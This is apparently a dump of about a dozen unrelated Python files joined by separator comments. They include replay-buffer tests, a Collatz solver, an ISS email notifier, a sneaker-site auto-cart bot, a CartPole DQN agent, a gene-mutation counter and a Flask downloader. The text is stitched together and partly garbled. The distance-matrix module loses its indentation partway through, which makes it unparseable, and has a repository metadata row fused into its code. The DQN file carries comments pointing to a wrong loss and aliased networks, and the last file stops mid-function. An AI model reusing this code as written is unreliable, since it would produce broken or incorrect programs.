        5.1, 14.1, 0, 0,
        1.1, 4, 5.1, 9, 0, 0, 0, 0,
        1, 0.1, 3, 1, 5, 0.1, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0
    ]))
def test_add_overflow():
    """Adding past the capacity wraps around and overwrites the oldest entries."""
    # Given
    tree = _SumTree(4)
    # When
    tree.add((1, 'a', 1.), 1)
    tree.add(('b', 2, 2.), 0.1)
    tree.add(195, 3)
    tree.add((3, 3., 'c'), 1)
    tree.add('d', 5)
    tree.add(19287412.214121, 0.1)
    tree.add(0, 9)
    # Then
    assert_that(tree.priorities_range, equal_to((0.1, 9)))
    assert_that(tree._max_priorities_num, equal_to(1))
    assert_that(tree._min_priorities_num, equal_to(1))
    assert_that(tree._data, equal_to(['d', 19287412.214121, 0, (3, 3., 'c')]))
    assert_that(tree._tree, equal_to([15.1, 5.1, 10, 5, 0.1, 9, 1]))
def test_get_not_full():
    """get_data walks the partially-filled tree to the leaf covering the value."""
    # Given
    tree = _SumTree(16)
    tree._data = [
        (1, 'a', 1.), ('b', 2, 2.), 195,
        (3, 3., 'c'), 'd', 19287412.214121, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0
    ]
    tree._tree = [
        22,
        22, 0,
        7, 15, 0, 0,
        4, 3, 6, 9, 0, 0, 0, 0,
        1, 3, 1, 2, 1, 5, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0
    ]
    # When
    data1 = tree.get_data(9.3)
    data2 = tree.get_data(10.7)
    data3 = tree.get_data(5.1)
    data4 = tree.get_data(0)
    data5 = tree.get_data(22)
    data6 = tree.get_data(13.001)
    data7 = tree.get_data(1.9)
    # Then
    assert_that(data1, equal_to((19287412.214121, 5, 5)))
    assert_that(data2, equal_to((19287412.214121, 5, 5)))
    assert_that(data3, equal_to(((3, 3., 'c'), 3, 2)))
    assert_that(data4, equal_to(((1, 'a', 1.), 0, 1)))
    assert_that(data5, equal_to((0, 6, 9)))
    assert_that(data6, equal_to((0, 6, 9)))
    assert_that(data7, equal_to((('b', 2, 2.), 1, 3)))
def test_get_overflow():
    """get_data still resolves correctly on a tree that has wrapped around."""
    # Given
    tree = _SumTree(4)
    tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
    tree._tree = [
        15,
        5, 10,
        4, 1, 7, 3
    ]
    # When
    data1 = tree.get_data(0.31)
    data2 = tree.get_data(4.7)
    data3 = tree.get_data(11.9999)
    data4 = tree.get_data(12.1)
    data5 = tree.get_data(15)
    # Then
    assert_that(data1, equal_to(('d', 0, 4)))
    assert_that(data2, equal_to((19287412.214121, 1, 1)))
    assert_that(data3, equal_to((0, 2, 7)))
    assert_that(data4, equal_to(((3, 3., 'c'), 3, 3)))
    assert_that(data5, equal_to(((3, 3., 'c'), 3, 3)))
def test_get_higher_than_total():
    """Requesting a value above the total priority is rejected."""
    # Given
    tree = _SumTree(4)
    tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
    tree._tree = [
        15,
        5, 10,
        4, 1, 7, 3
    ]
    # When
    with pytest.raises(AssertionError):
        tree.get_data(15.001)
def test_update_priority_no_maxmin_change():
    """Updates between the min and max leave the tracked priority range intact."""
    # Given
    tree = _SumTree(8)
    tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
    tree._tree = [
        16,
        6, 10,
        4, 2, 7, 3,
        1, 3, 1, 1, 4, 3, 1, 2
    ]
    tree._min_priority = 1
    tree._min_priorities_num = 4
    tree._max_priority = 4
    tree._max_priorities_num = 1
    # When
    tree.update_priority(0, 2)
    tree.update_priority(2, 2)
    tree.update_priority(5, 2)
    tree.update_priority(6, 2)
    # Then
    assert_that(tree.priorities_range, equal_to((1, 4)))
    assert_that(tree._max_priorities_num, equal_to(1))
    assert_that(tree._min_priorities_num, equal_to(1))
    assert_that(tree._data, equal_to(['d', 19287412.214121, 0, (3, 3., 'c')]))
    assert_that(tree._tree, equal_to([
        18,
        8, 10,
        5, 3, 6, 4,
        2, 3, 2, 1, 4, 2, 2, 2
    ]))
def test_update_priority_maxmin_run_out():
    """When all current min/max leaves are updated away, the range is recomputed."""
    # Given
    tree = _SumTree(8)
    tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
    tree._tree = [
        18,
        8, 10,
        5, 3, 7, 3,
        2, 3, 1, 2, 4, 3, 1, 2
    ]
    tree._min_priority = 1
    tree._min_priorities_num = 2
    tree._max_priority = 4
    tree._max_priorities_num = 1
    # When
    tree.update_priority(4, 3)
    tree.update_priority(2, 2)
    tree.update_priority(6, 3)
    tree.update_priority(1, 3)
    tree.update_priority(3, 2)
    tree.update_priority(5, 2)
    # Then
    assert_that(tree.priorities_range, equal_to((2, 3)))
    assert_that(tree._max_priorities_num, equal_to(3))
    assert_that(tree._min_priorities_num, equal_to(5))
    assert_that(tree._data, equal_to(['d', 19287412.214121, 0, (3, 3., 'c')]))
    assert_that(tree._tree, equal_to([
        19,
        9, 10,
        5, 4, 5, 5,
        2, 3, 2, 2, 3, 2, 3, 2
    ]))
def test_update_priority_maxmin_overwrite():
    """Priorities written outside the old range must become the new min/max."""
    # Given
    tree = _SumTree(8)
    tree._data = ['d', 19287412.214121, 0, (3, 3., 'c')]
    tree._tree = [
        18,
        8, 10,
        5, 3, 7, 3,
        2, 3, 1, 2, 4, 3, 1, 2
    ]
    tree._min_priority = 1
    tree._min_priorities_num = 2
    tree._max_priority = 4
    tree._max_priorities_num = 1
    # When
    tree.update_priority(1, 5)
    tree.update_priority(4, 0.5)
    tree.update_priority(3, 1)
    tree.update_priority(7, 5)
    # Then
    assert_that(tree.priorities_range, equal_to((0.5, 5)))
    assert_that(tree._max_priorities_num, equal_to(2))
    assert_that(tree._min_priorities_num, equal_to(1))
    assert_that(tree._data, equal_to(['d', 19287412.214121, 0, (3, 3., 'c')]))
    assert_that(tree._tree, equal_to([
        18.5,
        9, 9.5,
        7, 2, 3.5, 6,
        2, 5, 1, 1, 0.5, 3, 1, 5
    ]))
# ---- dataset separator: K-Kielak/gairl / tests/memory/test_sum_tree.py ----
# The following iterative sequence is defined for the set of positive integers:
# n → n/2 (n is even)
# n → 3n + 1 (n is odd)
# Which starting number, under one million, produces the longest chain?
from time import time
start = time()  # wall-clock start time, reported in the final print
def count_chain(start_num: int):
    """Return the length of the Collatz chain starting at start_num.

    The count includes both endpoints, e.g. count_chain(13) == 10 for
    13 -> 40 -> 20 -> 10 -> 5 -> 16 -> 8 -> 4 -> 2 -> 1.
    """
    chain = 1  # counts the starting number itself
    while start_num != 1:
        if start_num == 10:
            # Shortcut: the known tail 10 -> 5 -> 16 -> 8 -> 4 -> 2 -> 1 adds
            # six more terms after the already-counted 10.  (The original
            # added seven, over-counting every chain that passes through 10.)
            chain += 6
            break
        if start_num % 2 == 0:
            start_num //= 2  # floor division keeps the value an int
        else:
            start_num = 3 * start_num + 1
        chain += 1
    return chain
# Scan every starting number below one million and keep the one with the
# longest Collatz chain (Project Euler problem 14).  The fused dataset
# metadata that corrupted the final line has been removed, and the float
# `while num < 1e6` counter is replaced by an integer range.
highest_chain = (13, 10)  # (starting number, chain length) of the best so far
for num in range(13, 1_000_000):
    current_chain = count_chain(num)
    if current_chain > highest_chain[1]:
        highest_chain = (num, current_chain)
print(f"The number with the longest chain is {highest_chain[0]} with a chain of {highest_chain[1]}. "
      f"Found in {time()-start} seconds.")
from . import types
class Schema:
    """Validator that checks values against a single expected type."""

    def __init__(self, type):
        # NOTE: the parameter shadows the builtin `type`.  The original left a
        # debug `print(type(self))` here, which called the shadowed name with
        # `self` -- a leftover that could crash on construction; removed.
        self.type = type
        self.type_name = types.get_type_name(type)

    def assert_validation(self, value):
        """Raise TypeError when value is not an instance of the schema type."""
        try:
            same_type = isinstance(value, self.type)
        except TypeError:
            # self.type is not usable with isinstance(); treat as invalid.
            same_type = False
        if not same_type:
            raise TypeError(f"\"{value}\" is not a {self.type_name}")

    def validate(self, value):
        """Return a list of error messages (empty when value is valid)."""
        errors: list[str] = []
        try:
            if not isinstance(value, self.type):
                errors.append(f"\"{value}\" is not a {self.type_name}")
        except TypeError:
            errors.append(f"\"{value}\" is not a {self.type_name}")
        return errors
def string():
    """Build a Schema that accepts string values."""
    return Schema(types.string)
def integer():
    """Build a Schema that accepts integer values."""
    return Schema(types.integer)
def float():
    """Build a Schema that accepts float values.

    NOTE: shadows the builtin `float`; the name is kept for API compatibility.
    """
    return Schema(types.float)
def boolean():
    """Build a Schema that accepts boolean values."""
    return Schema(types.boolean)
import datetime
import smtplib
import time
import requests
import api_keys
# Observer position in degrees; the ISS counts as "nearby" within +/-5 deg.
MY_LAT = 51.53118881973776
MY_LONG = -0.08949588609011068
# Current ISS position from the Open Notify API (values arrive as strings).
response = requests.get(url="http://api.open-notify.org/iss-now.json")
data = response.json()
longitude = data["iss_position"]["longitude"]
latitude = data["iss_position"]["latitude"]
print(latitude, longitude)
# Sunrise/sunset for the observer; formatted=0 requests ISO timestamps.
parameters = {
    "lat": MY_LAT,
    "lng": MY_LONG,
    "formatted": 0
}
response = requests.get(url=f"https://api.sunrise-sunset.org/json", params=parameters)
data = response.json()
# Keep only the hour component, e.g. "...T07:59:02+00:00" -> 7.
# NOTE(review): these hours appear to be UTC while is_night() compares them
# against the local clock -- confirm the timezone handling.
sunrise = int(data["results"]["sunrise"].split("T")[1].split(":")[0])
sunset = int(data["results"]["sunset"].split("T")[1].split(":")[0])
def is_nearby():
    """True when the ISS is within +/-5 degrees of our position on both axes."""
    lat_close = abs(float(latitude) - MY_LAT) <= 5
    long_close = abs(float(longitude) - MY_LONG) <= 5
    return lat_close and long_close
def is_night():
    """True when the current hour falls outside the daylight window."""
    current_hour = datetime.datetime.now().hour
    return current_hour >= sunset or current_hour <= sunrise
# Poll once a minute; when the ISS is overhead after dark, send ourselves an
# email notification via Gmail SMTP.
while True:
    time.sleep(60)
    if is_nearby() and is_night():
        with smtplib.SMTP(host="smtp.gmail.com") as conn:
            conn.starttls()
            conn.login(user=api_keys.my_email, password=api_keys.password)
            # NOTE(review): the message has no Subject: header -- many mail
            # clients will render it oddly; confirm this is intended.
            conn.sendmail(from_addr=api_keys.my_email, to_addrs=api_keys.my_email, msg="update \n\nis nearby")
# ---- dataset separator: Zoom30/100-python / Day 33/Day 33.py ----
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.exceptions import ParseError
from rest_framework.decorators import action, api_view
from core import models, serializers, utils
from rest_framework_simplejwt.tokens import RefreshToken
@api_view(['POST'])
def signup(req):
    """Register a new user and return a fresh JWT refresh/access token pair."""
    payload = {
        'email': req.data.get('email'),
        'password': req.data.get('password'),
    }
    serializer = serializers.UserSerializer(data=payload)
    if not serializer.is_valid():
        raise ParseError(serializer.errors)
    serializer.save()
    user = models.User.objects.get(id=serializer.data['id'])
    refresh = RefreshToken.for_user(user)
    return Response({
        'refresh': str(refresh),
        'access': str(refresh.access_token),
    })
def test(path):
  """Run a VASP volume/ionic/cellshape relaxation of bulk Si and check the
  relaxed stress, forces and total energy.

  :param path: directory containing a ``pseudos/Si`` pseudopotential.

  (Fix: the ``def`` line had dataset-junk fused onto it, which made the file
  unparseable; the logic below is unchanged.)
  """
  from glob import glob
  from os.path import join
  from shutil import rmtree
  from tempfile import mkdtemp
  from numpy import all, abs
  from quantities import kbar, eV, angstrom
  from pylada.crystal import Structure
  from pylada.vasp import Vasp
  from pylada.vasp.relax import Relax
  from pylada import default_comm

  # Diamond-cubic Si primitive cell (scale in angstrom).
  structure = Structure([[0, 0.5, 0.5],[0.5, 0, 0.5], [0.5, 0.5, 0]], scale=5.43, name='has a name')\
    .add_atom(0,0,0, "Si")\
    .add_atom(0.25,0.25,0.25, "Si")

  vasp = Vasp()
  vasp.kpoints = "Automatic generation\n0\nMonkhorst\n2 2 2\n0 0 0"
  vasp.prec = "accurate"
  vasp.ediff = 1e-5
  vasp.encut = 1
  vasp.ismear = "fermi"
  vasp.sigma = 0.01
  vasp.relaxation = "volume"
  vasp.add_specie = "Si", "{0}/pseudos/Si".format(path)
  directory = mkdtemp()
  try:
    functional = Relax(copy=vasp)
    assert abs(functional.ediff - 1e-5) < 1e-8
    assert functional.prec == 'Accurate'
    result = functional(structure, outdir=directory, comm=default_comm,
                        relaxation="volume ionic cellshape")
    assert result.success
    def sortme(a): return int(a.split('/')[-1])
    dirs = sorted(glob(join(join(directory, '*'), '[0-9]')), key=sortme)
    # for previous, current in zip(dirs, dirs[1:]):
    #   assert len(check_output(['diff', join(previous, 'CONTCAR'), join(current, 'POSCAR')])) == 0
    # assert len(check_output(['diff', join(current, 'CONTCAR'), join(directory, 'POSCAR')])) == 0
    assert result.stress.units == kbar and all(abs(result.stress) < 1e0)
    assert result.forces.units == eV/angstrom and all(abs(result.forces) < 1e-1)
    assert result.total_energy.units == eV and all(abs(result.total_energy + 10.668652*eV) < 1e-2)
  finally:
    # Keep the hard-coded debug directory, clean up everything else.
    if directory != '/tmp/test/relax': rmtree(directory)
    pass
if __name__ == "__main__":
  # Usage: python runrelax.py <path-to-pseudopotentials>
  import sys
  test(sys.argv[1])
# ---- dataset separator: mdavezac/LaDa / vasp/tests/runrelax.py ----
import math
from distributed import Client
from tqdm import tqdm
import numpy as np
import pandas as pd
def calculate_distance_between_queries(data_df, queries, metric, dask_client: Client= None, n_blocks = None):
    """Compute pairwise distances only for the instance pairs listed in `queries`.

    :param data_df: DataFrame with one series per row.
    :param queries: iterable of (i1, i2) positional index pairs to evaluate.
    :param metric: object exposing ``distance(profile1, profile2)``.
    :param dask_client: optional dask client; when None the pairs are
        evaluated locally with a tqdm progress bar.
    :param n_blocks: number of chunks the query list is split into.
    :return: symmetric DataFrame indexed by the original data_df index of the
        involved instances; unqueried pairs stay NaN.
    """
    # Only ship the rows that actually appear in some query.
    involved_instances = np.unique(queries, axis = None)
    relevant_data = data_df.reset_index(drop=True).loc[involved_instances]
    chunks = np.array_split(queries, n_blocks)
    if dask_client is None:
        results = [_calculate_pair_list(task, metric, relevant_data) for task in tqdm(chunks, desc='calculating distances')]
    else:
        # Broadcast the reduced frame once so every worker shares one copy.
        data_df_future = dask_client.scatter(relevant_data, broadcast=True)
        futures = dask_client.map(_calculate_pair_list, chunks, metric = metric, data_df = data_df_future)
        results = dask_client.gather(futures)
    # collect the results in a distance matrix (NaN marks unqueried pairs)
    n_series = relevant_data.shape[0]
    dist_matrix = np.full((n_series, n_series), np.nan)
    dist_matrix = pd.DataFrame(dist_matrix, index = relevant_data.index, columns = relevant_data.index)
    for chunk, result in zip(chunks, results):
        for (i1,i2), r in zip(chunk, result):
            # distances are symmetric, fill both triangles
            dist_matrix.loc[i1, i2] = r
            dist_matrix.loc[i2, i1] = r
    # make into df with original index
    distance_df = pd.DataFrame(dist_matrix.to_numpy(), index= data_df.index[involved_instances], columns = data_df.index[involved_instances])
    return distance_df
def calculate_full_distance_matrix(data_df, metric, dask_client:Client=None, n_blocks = None):
    """
    Calculate the full pairwise distance matrix for the rows of data_df.

    Only the lower triangle is computed (in `n_blocks` independent blocks,
    optionally distributed over a dask cluster) and then mirrored.
    Returns a symmetric DataFrame indexed by data_df.index.
    """
    if n_blocks is None:
        # Default: ~10 blocks per dask worker, or a single local block.
        if dask_client is not None:
            n_blocks = len(dask_client.scheduler_info()['workers'])*10
        else:
            n_blocks = 1
    # Make the tasks
    n_series = data_df.shape[0]
    print('generating blocks')
    blocks = _generate_blocks(n_series, n_blocks)
    # tasks = [(data_df.iloc[row_start: row_end,:],data_df.iloc[column_start:column_end]) for
    #         (row_start, row_end), (column_start, column_end) in tqdm(blocks, desc='Making blocks')]
    print('calculating blocks')
    # execute the tasks
    if dask_client is None:
        results = [_calculate_block(task, metric, data_df) for task in tqdm(blocks, desc='Calculating distances')]
    else:
        # Broadcast data_df once; workers receive only block index ranges.
        data_df_future = dask_client.scatter(data_df, broadcast = True)
        futures = dask_client.map(_calculate_block, blocks, metric = metric, data_df = data_df_future)
        results = dask_client.gather(futures)
    # gather the results
    dist_matrix = np.zeros((n_series, n_series))
    for result, block in zip(results, blocks):
        dist_matrix[block[0][0]: block[0][1], block[1][0]:block[1][1]] = result
    # make upper triangular matrix into full symmetrical distance matrix
    # (zero the strict upper triangle first -- diagonal blocks computed both halves)
    dist_matrix[np.triu_indices(data_df.shape[0], k=1)] = 0
    dist_matrix = dist_matrix + dist_matrix.T
    # make into a nice dataframe
    distance_df = pd.DataFrame(dist_matrix, index=data_df.index, columns=data_df.index)
    return distance_df
def _generate_blocks(nb_series, total_blocks=500):
"""
A util function that divides the full matrix into several (equally-sized) blocks that can be calculated in parallel
The function won't generate 'total_blocks' directly but will simply try to find a number close enough
Returns a list of (start_row, end_row),(start_col, end_col)
"""
blocks_each_dimension = math.ceil(math.sqrt(total_blocks))
profiles_per_block = math.ceil(nb_series / blocks_each_dimension)
blocks = []
for row_start in range(0, nb_series, profiles_per_block):
row_end = min(row_start + profiles_per_block, nb_series)
for column_start in range(0, row_start + 1, profiles_per_block):
column_end = min(column_start + profiles_per_block, nb_series)
blocks.append(((row_start, row_end), (column_start, column_end)))
return blocks
def _calculate_pair_list(query_indices, metric, data_df):
result = []
for i1, i2 in query_indices:
profile1 = data_df.loc[i1]
profile2 = data_df.loc[i2]
distance = metric.distance(profile1, profile2)
result.append(distance)
return result
def _calculate_block(block_indices, metric, data_df):
"""
Calculates the distances between the first and second collection of profiles (in tuple profile_tuple)
"""
(row_start, row_end), (column_start, column_end) = block_indices
profiles1 = data_df.iloc[row_start: row_end]
profiles2 = data_df.iloc[column_start: column_end]
distance_matrix = np.zeros((profiles1.shape[0], profiles2.shape[0]))
for idx1, (index, profile1) in enumerate(profiles1.iterrows()):
for idx2, (index, profile2) in enumerate(profiles2.iterrows()):
distance = metric.distance(profile1, profile2)
distance_matrix[idx1, idx2] = distance
return distance_matrix | jankrans/Conditional-Generative-Neural-Networks | repositories/profile-clustering/energyclustering/clustering/similarity/distmatrix.py | distmatrix.py | py | 4,922 | python | en | code | 0 | github-code | 36 |
import requests
import time
from bs4 import BeautifulSoup as bs
import re
import webbrowser
# Shoe sizes to try to cart, matched against each size <option>'s text.
sizes = [7, 9.5, 11]
new_arrivals_page_url = 'https://www.theclosetinc.com/collections/new-arrivals'
base_url = 'https://www.theclosetinc.com'
# NOTE(review): post_url is never used below -- confirm it is still needed.
post_url = 'https://www.theclosetinc.com/cart/add.js'
# Product-name fragments that identify the target release.
keywords = ['yeezy', 'inertia']
def get_product_page_url():
    """Poll the new-arrivals page until a product matching `keywords` appears,
    then hand its full URL to add_to_cart().

    Fix: when no match showed up after all 15 attempts the original fell
    through and crashed with AttributeError on `None.get(...)`; it now raises
    a clear RuntimeError instead.
    """
    href_link = None
    for retries in range(15):
        response = session.get(new_arrivals_page_url).text
        soup = bs(response, 'lxml')
        print('Trying to find keywords, attempt {}...'.format(retries+1))
        href_link = soup.find(
            "a", {'itemprop': 'url', 'href': re.compile("|".join(keywords))})
        if href_link is not None:
            break
        time.sleep(1)
    if href_link is None:
        raise RuntimeError('No product matching {} found after 15 attempts'.format(keywords))
    product_page_url = base_url + href_link.get('href')
    print("Acquired product page url: {}".format(product_page_url))
    add_to_cart(product_page_url)
def add_to_cart(product_page_url):
    """Open a browser cart-permalink for each wanted size found in stock.

    Scans the product page's size <option> elements by data-sku suffix;
    sizes with no matching option are reported as sold out.
    """
    response = session.get(product_page_url).text
    soup = bs(response, 'lxml')
    for size in sizes:
        option = soup.find('option', {'data-sku': re.compile('-' + str(size))})
        if option:
            # Guard against partial data-sku matches (e.g. 7 vs 7.5).
            if float(option.text) == size:
                id = option.get('value')  # variant id used in the cart permalink
                webbrowser.open_new(base_url + '/cart/{}:1'.format(id))
        else:
            print("Size {} sold out...".format(size))
if __name__ == "__main__":
    total_time = time.time()
    # One shared session so headers (and any cookies) persist across requests.
    session = requests.Session()
    session.headers.update(
        {'User-Agent': '"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"'}
    )
    get_product_page_url()
    print("Total time: ", time.time() - total_time)
# ---- dataset separator: athithianr/deadstock-bot / bots/theclosetinc_bot.py ----
# -*- coding: utf-8 -*-
import argparse
import sys
import gym
from gym import wrappers, logger
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import numpy as np
import random
from random import choices
class RandomAgent(object):
    """DQN-style agent with an experience-replay memory and a duplicated
    (target) network.  The class name is historical -- act() is
    epsilon-greedy over the Q-network, not uniformly random.
    """

    def __init__(self, action_space):
        """Initialize an Agent object.

        Params
        =======
            action_space: the environment's action space (stored, unused below)

        Attributes
        =======
            size (int): replay-memory capacity
            memory (list): tuples of (state, action, next_state, reward, done)
            batch_size (int): minibatch size drawn from memory (N)
            state_size (int): dimension of each state (D_in)
            action_size (int): dimension of each action (D_out)
        """
        self.action_space = action_space
        self.size = 100000 # Memory size
        self.memory = []
        self.batch_size = 32
        self.state_size = 4
        self.action_size = 2
        self.learning_rate = 1e-3
        self.model = MultipleLayer(self.state_size, 100, self.action_size, 1)
        self.model_duplicata = MultipleLayer(self.state_size, 100, self.action_size, 1)
        self.loss_fn = torch.nn.MSELoss(reduction='sum')
        self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)
        self.learn_state = 0
        self.gamma = 0.95
        self.upadteModel()
    # action 1 = right, action 0 = left
    def act(self, observation, reward, done):
        """Pick an action from the Q-network's output.

        NOTE(review): with probability 1-epsilon this takes the argmax, but
        with probability epsilon it takes the argmin instead of a *random*
        action -- confirm this deviation from standard epsilon-greedy.
        """
        epsilon = 0.1
        rnd = random.uniform(0, 1)
        res = self.model(torch.tensor(observation).float())
        maxval, idx = res.max(0)
        maxval, idx2 = res.min(0)
        if rnd < 1-epsilon:
            indices = idx.item()
        else:
            indices = idx2.item()
        return indices
    def upadteModel(self):
        """Sync the target network with the online network.

        NOTE(review): this assigns the *same layer objects* rather than
        copying weights, so both networks become aliases of one another --
        confirm a state_dict copy was not intended.
        """
        self.model_duplicata.linear1 = self.model.linear1
        self.model_duplicata.w = self.model.w
        self.model_duplicata.linear2 = self.model.linear2
    def remember(self, value):
        """Append a transition tuple, evicting the oldest beyond `size`."""
        self.memory.append(value)
        if len(self.memory) > self.size:
            self.memory.pop(0)
    def showMemory(self):
        """Print the raw replay memory (debug helper)."""
        print(self.memory)
    def getMemory(self):
        """Return the raw replay memory list."""
        return self.memory
    def retry(self, batch_size):
        """Train on one random minibatch from the replay memory.

        NOTE(review): the loss is MSE between Q(s,a) and the *squared* TD
        error JO, not between Q(s,a) and the TD target -- this looks wrong
        for standard DQN; confirm intent.
        """
        minibatch = random.sample(self.memory, self.batch_size)
        for etat, action, etat_suivant, reward, done in minibatch:
            qO = self.model(torch.tensor(etat).float())
            qOsa = qO[action]
            # target network evaluates the next state
            qO_suivant = self.model_duplicata(torch.tensor(etat_suivant).float())
            rPlusMaxNext = reward + self.gamma*torch.max(qO_suivant)
            if not done :
                JO = pow(qOsa - rPlusMaxNext, 2)
            else :
                JO = pow(qOsa - reward, 2)
            loss = self.loss_fn(qOsa, JO)
            self.optimizer.zero_grad()
            loss.backward()
            self.optimizer.step()
        # Periodically refresh the target network.
        if (self.learn_state % 10000 == 0):
            print("learn_state : ", self.learn_state)
            self.upadteModel()
        self.learn_state +=1
class MultipleLayer(torch.nn.Module):
    """MLP: Linear(D_in, H) -> sigmoid, then (nbcouche - 1) hidden
    Linear(H, H) -> sigmoid layers, then Linear(H, D_out).

    Bug fixed: the hidden layers were stored in a plain Python list, so
    torch never registered their parameters -- the optimizer silently
    skipped them and they were missing from state_dict.  ModuleList
    registers them properly.
    """

    def __init__(self, D_in, H, D_out, nbcouche):
        super(MultipleLayer, self).__init__()
        self.n_couche = nbcouche
        self.linear1 = torch.nn.Linear(D_in, H)
        # ModuleList (not a bare list) so the layers' weights appear in
        # .parameters() and are trained/saved with the rest of the model.
        self.w = torch.nn.ModuleList(torch.nn.Linear(H, H) for i in range(nbcouche))
        self.linear2 = torch.nn.Linear(H, D_out)

    def forward(self, x):
        y_pred = torch.sigmoid(self.linear1(x))
        # NOTE: only the first n_couche - 1 hidden layers are applied,
        # matching the original behaviour (the last list entry is unused).
        for n in range(self.n_couche - 1):
            y_pred = torch.sigmoid(self.w[n](y_pred))
        y_pred = self.linear2(y_pred)
        return y_pred
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description=None)
    parser.add_argument('env_id', nargs='?', default='CartPole-v1', help='Select the environment to run')
    args = parser.parse_args()
    logger.set_level(logger.INFO)
    env = gym.make(args.env_id)
    # Monitor records episode statistics/videos into outdir.
    outdir = '/tmp/random-agent-results'
    env = wrappers.Monitor(env, directory=outdir, force=True)
    env.seed(0)
    agent = RandomAgent(env.action_space)
    listSomme = []          # cumulative reward per episode, for the final plot
    episode_count = 260
    reward = 1
    max_reward = 500        # stop an episode once its return exceeds this
    etat_space = env.observation_space.shape[0]
    action_space = env.action_space.n
    for i in range(episode_count):
        somme = 0           # return accumulated in this episode
        etat = env.reset()
        done = False
        while True:
            # env.render()
            action = agent.act(etat, reward, done)
            etat_suivant, reward, done, _ = env.step(action)
            # Penalise episode termination (pole fell / out of bounds).
            reward = reward if not done else -10
            tensorAdd = (etat, action, etat_suivant, reward, done)
            agent.remember(tensorAdd)
            etat = etat_suivant
            somme += reward
            if done:
                agent.upadteModel()
                break
            if somme > max_reward:
                break
        # Train once per episode as soon as the memory holds a full batch.
        if len(agent.memory) > agent.batch_size:
            agent.retry(agent.batch_size)
        listSomme.append(somme)
    # Plot return vs. episode index.
    x = np.arange(episode_count)
    y = np.array(listSomme)
    plt.plot(x, y, "-ob", markersize=2, label="nom de la courbe")
    plt.show()
    env.close()
# ---- dataset separator: ThibaudPerrin/tp2-bio-inspi / TP2_Cartpole.py ----
import os
def get_mutations(gene, file, base_dir="D:/Chantal/Data/Maffiles"):
    """Collect the protein changes recorded for `gene` in one MAF file.

    :param gene: gene symbol to look for (column 0 of the MAF file).
    :param file: name of the MAF file inside `base_dir`.
    :param base_dir: directory containing the MAF files.  Defaults to the
        previously hard-coded location, so existing callers keep working.
    :return mutations: list of mutation strings (column 35) for rows whose
        gene matches and whose mutation type (column 8) is a coding type
        listed in `mutationlist`.
    """
    mutations = []
    mutationlist = ["Frame_Shift_Del", "Frame_Shift_Ins", "In_Frame_Del", "In_Frame_Ins", "Missense_Mutation",
                    "Nonsense_Mutation", "Nonstop_Mutation"]
    filename = os.path.join(base_dir, file)
    with open(filename) as maffile:
        maffile.readline()  # skip the header row
        for line in maffile:
            fields = line.split("\t")  # split once instead of three times per line
            if fields[0] == gene and fields[8] in mutationlist:
                mutations.append(fields[35])
    return mutations
def update_mutation_dic(mutation_dictionary, mutations):
    """Merge one file's mutation list into the running occurrence counts.

    :param mutation_dictionary: mapping mutation -> count, updated in place.
    :param mutations: mutations found in a single MAF file.
    """
    for mutation in mutations:
        mutation_dictionary[mutation] = mutation_dictionary.get(mutation, 0) + 1
def main():
    """Ask for a gene, count its mutations across all MAF files, and write
    the counts (most frequent first) to mutation_counts.txt."""
    # Start from a clean output file.
    if os.path.exists("D:/Chantal/Data/mutation_counts.txt"):
        os.remove("D:/Chantal/Data/mutation_counts.txt")
    mutation_dictionary = {}
    gene = input("For which gene do you want to know the mutations? ")
    maffiles = os.listdir("D:/Chantal/Data/Maffiles")
    for file in maffiles:
        mutations = get_mutations(gene.upper(), file)
        print(mutations)
        update_mutation_dic(mutation_dictionary, mutations)
        print(mutation_dictionary)
    # Sort by occurrence count, descending.
    sorted_dic = sorted(mutation_dictionary.items(), key=lambda x: x[1], reverse=True)
    mutation_counts_file = open("D:/Chantal/Data/mutation_counts.txt", "a")
    for mutation in sorted_dic:
        mutation_counts_file.write(mutation[0] + ": " + str(mutation[1]) + "\n")
    mutation_counts_file.close()
main()
# ---- dataset separator: Chantal1501/Genetic-interactions-in-childhood-cancer / gene_mutations.py ----
#!/usr/bin/python3
import datetime
import flask
from . import client
from . import session
bp = flask.Blueprint("main", __name__)  # blueprint holding this module's routes
def format_time(seconds):
  """Render a duration in seconds as H:MM:SS."""
  duration = datetime.timedelta(seconds=seconds)
  return str(duration)
def format_size(size):
  """Human-readable byte count, e.g. 1536 -> '1.5KB'.

  Bug fixed: sizes of 1 TB and above used to fall off the end of the loop
  and return None; they now render with a 'TB' suffix.
  """
  for unit in ["B","KB","MB","GB"]:
    if abs(size) < 1024.0:
      return "%3.1f%s" % (size, unit)
    size /= 1024.0
  return "%3.1f%s" % (size, "TB")
@bp.route("/", methods=["GET", "POST"])
def index():
  """Landing page; on POST, fetch and display metadata for the given address."""
  with client.Client() as flask.g.client:
    # Helpers made available to the template for rendering.
    context = {
      "format_time": format_time,
      "format_size": format_size
    }
    if flask.request.method == "POST":
      address = flask.request.form["address"]
      context["address"] = address
      context["meta"] = flask.g.client.metadata(address)
    return flask.render_template("index.html", **context)
@bp.route("/status")
def status():
  """List downloads, hiding those not started from this session.

  Directories the client no longer reports are pruned from the session.
  """
  with client.Client() as flask.g.client, session.Session() as flask.g.session:
    downloads = flask.g.client.get_downloads()
    required_directories = flask.g.session.get_directories()
    existing_directories = set()
    for download in downloads:
      if download["directory"] in required_directories:
        existing_directories.add(download["directory"])
        download["hidden"] = False
      else:
        download["hidden"] = True
    # Keep only directories that still exist on the client side.
    flask.g.session.set_directories(existing_directories)
    context = {
      "downloads": downloads,
      "format_size": format_size
    }
    return flask.render_template("status.html", **context)
@bp.route("/download", methods=["POST"])
def download():
  """Start a download with the selected video/audio formats and remember it
  in the session, then redirect back to the index page."""
  with client.Client() as flask.g.client, session.Session() as flask.g.session:
    address = flask.request.form["address"]
    video_format = flask.request.form["video_format"]
    audio_format = flask.request.form["audio_format"]
    # "video+audio"; stripping '+' handles the cases where either is empty,
